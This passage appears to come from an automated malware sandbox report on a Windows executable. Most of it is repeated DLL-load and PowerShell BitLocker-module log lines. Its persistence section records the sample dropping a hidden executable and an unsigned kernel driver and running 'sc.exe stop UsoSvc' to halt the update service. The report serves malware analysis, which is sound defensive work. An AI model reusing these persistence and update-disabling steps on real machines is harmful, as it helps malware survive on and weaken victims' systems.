                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: nlGOh9K5X5.exeStatic PE information: Image base 0x140000000 > 0x60000000
                  Source: nlGOh9K5X5.exeStatic file information: File size 7198720 > 1048576
                  Source: nlGOh9K5X5.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x6c0600
                  Source: nlGOh9K5X5.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: mfpmikspvfzi.exe, 00000021.00000003.1782446141.0000024320770000.00000004.00000001.00020000.00000000.sdmp
                  Source: nlGOh9K5X5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: nlGOh9K5X5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: nlGOh9K5X5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: nlGOh9K5X5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: nlGOh9K5X5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: nlGOh9K5X5.exeStatic PE information: section name: .00cfg
                  Source: mfpmikspvfzi.exe.0.drStatic PE information: section name: .00cfg
                  Source: C:\Windows\System32\conhost.exeCode function: 56_2_0000000140001394 push qword ptr [0000000140009004h]; ret 56_2_0000000140001403

                  Persistence and Installation Behavior

                  barindex
                  Sample is not signed and drops a device driver
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeFile created: C:\Windows\TEMP\amhsyemgqpki.sysJump to behavior
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeFile created: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeJump to dropped file
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeFile created: C:\Windows\Temp\amhsyemgqpki.sysJump to dropped file
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeFile created: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeJump to dropped file
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeFile created: C:\Windows\Temp\amhsyemgqpki.sysJump to dropped file
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
